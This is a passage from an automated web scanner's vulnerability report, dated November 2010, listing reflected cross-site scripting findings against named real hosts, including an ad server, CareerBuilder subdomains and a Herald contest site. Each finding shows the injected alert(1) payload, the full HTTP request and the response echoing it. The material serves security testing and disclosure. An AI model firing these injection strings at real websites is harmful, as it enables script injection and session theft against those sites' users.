Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1;adiframe=y">
...[SNIP]...

2.88. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92156"><script>alert(1)</script>4d96c896b2f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f;adiframe=y">
...[SNIP]...

2.89. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 64472><script>alert(1)</script>d67b57e15b9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=64472><script>alert(1)</script>d67b57e15b9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=64472><script>alert(1)</script>d67b57e15b9><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH;target=
...[SNIP]...

2.90. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d03"><script>alert(1)</script>8cd0b4d7f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09;adiframe=y">
...[SNIP]...

2.91. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc81f"><script>alert(1)</script>6147fcf2f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1;adiframe=y">
...[SNIP]...

2.92. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5a07><script>alert(1)</script>ee1b21623f9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=f5a07><script>alert(1)</script>ee1b21623f9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=f5a07><script>alert(1)</script>ee1b21623f9><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH;target=
...[SNIP]...

2.93. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2771"><script>alert(1)</script>fe9daaa66f4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4;adiframe=y">
...[SNIP]...

2.94. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://banking-finance.careerbuilder.com
Path:   /bf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7438e"%20a%3db%2089af122eadb was submitted in the lr parameter. This input was echoed as 7438e" a=b 89af122eadb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bf.ic/Florida_Miami/?lr=cbcb_mh7438e"%20a%3db%2089af122eadb&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193077
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=3adeb3a3a665452cb3db8746cef2a482-343070718-RL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F382261A0B497E7E52C90A9B44136C94C95BE2C9A785411BADAB46C05F6A5E15C781B87732DBDCFD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:18 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:18 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL21
Date: Sun, 14 Nov 2010 22:25:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh7438e" a=b 89af122eadb" />
...[SNIP]...

2.95. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://banking-finance.careerbuilder.com
Path:   /bf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6025c'-alert(1)-'3bfd288b45f was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bf.ic/Florida_Miami/?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193722
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=903408c97ec947c08e82b77995846faa-343070747-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6509E4FC31D7F51112E8E6BD66A74398A35D57E2B3EBA0654540D3F956B9C1E4072777AFAB66DA72AF8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.96. http://cf.localwireless.com/wireless/signup.cfm [pageid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cf.localwireless.com
Path:   /wireless/signup.cfm

Issue detail

The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c44"%3b859ccf53fe9 was submitted in the pageid parameter. This input was echoed as 13c44";859ccf53fe9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wireless/signup.cfm?sid=1007&pageid=textalert1_main13c44"%3b859ccf53fe9 HTTP/1.1
Host: cf.localwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:24:13 GMT
Server: Apache
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4535



...[SNIP]...
er out internal URLs for exit link tracking.
s.s_timeZone = "-5" //Timezone for time parting plug-in. Use -5 for EST, -6 for CST, -7 for MST, and -8 for PST

/* props*/
s.pageName="textalert1_main13c44";859ccf53fe9" //gn: Page Name
s.hier1="miami+herald,wap,signup,index" //h1: Hierarchy
s.prop1="" //c1: internal search terms
s.prop2="" //c2: internal search type
s.prop3="" //c3: # of search results
s.prop4=
...[SNIP]...

2.97. http://contest.herald.com/cirquekoozamiami/standard/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /cirquekoozamiami/standard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460ad"><script>alert(1)</script>c14ec16b048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cirquekoozamiami/standard/?460ad"><script>alert(1)</script>c14ec16b048=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7334
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=NLNLEONDOGIEOKCHIODLANOL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/cirquekoozamiami/standard/index.asp?460ad"><script>alert(1)</script>c14ec16b048=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.98. http://contest.herald.com/nascar/standard/ [9cec8">2f7e3e1de94 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The value of the 9cec8"><script>alert(1)</script>2f7e3e1de94 request parameter is copied into the HTML document as plain text between tags. The payload c6ae2<script>alert(1)</script>890e9b13aa5 was submitted in the 9cec8"><script>alert(1)</script>2f7e3e1de94 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1c6ae2<script>alert(1)</script>890e9b13aa5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: contest.herald.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7875
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=GNNLEONDLBLLKCBAAMLPJPOI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
</script>2f7e3e1de94=1c6ae2<script>alert(1)</script>890e9b13aa5" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.99. http://contest.herald.com/nascar/standard/ [9cec8">HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The value of the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM request parameter is copied into the HTML document as plain text between tags. The payload 290ad<script>alert(1)</script>9c0c1192ca0 was submitted in the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM=1290ad<script>alert(1)</script>9c0c1192ca0 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: contest.herald.com
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7910
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM=1290ad<script>alert(1)</script>9c0c1192ca0" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.100. http://contest.herald.com/nascar/standard/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cec8"><script>alert(1)</script>2f7e3e1de94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=JLNLEONDPKNMJMBLEDNCDCCF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?9cec8"><script>alert(1)</script>2f7e3e1de94=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.101. http://contest.herald.com/nascar/standard/index.asp [9cec8 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/index.asp

Issue detail

The value of the 9cec8 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd903"><script>alert(1)</script>b536c827e11 was submitted in the 9cec8 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7837
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.102. http://contest.herald.com/nascar/standard/index.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a89b"><script>alert(1)</script>3188a7af4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.103. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://customer-service.careerbuilder.com
Path:   /cs.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb3e"%20a%3db%20422e5f94b75 was submitted in the lr parameter. This input was echoed as 1eb3e" a=b 422e5f94b75 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cs.ic/Florida_Miami/?lr=cbcb_mh1eb3e"%20a%3db%20422e5f94b75&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190637
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=42ee23d9340f4db492a4a340c1372514-343070753-R6-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508E8A7C46AB17B4CC2649D27018AC4F86CFA6335C2EB6692671084E2DB62F4AE108378824736F440F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL6
Date: Sun, 14 Nov 2010 22:25:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh1eb3e" a=b 422e5f94b75" />
...[SNIP]...

2.104. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer-service.careerbuilder.com
Path:   /cs.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d08'-alert(1)-'04a0701f11a was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs.ic/Florida_Miami/?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191278
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=eb938c0781184bcfb4d4faf5fcfe8db1-343070776-VL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508074FA90E44D5B4F83A5472AC69B952B487300C8C40C2DDB00966E3520AE4545781BCE2F2128AA0A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:15 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:16 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL33
Date: Sun, 14 Nov 2010 22:26:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&ff=21';
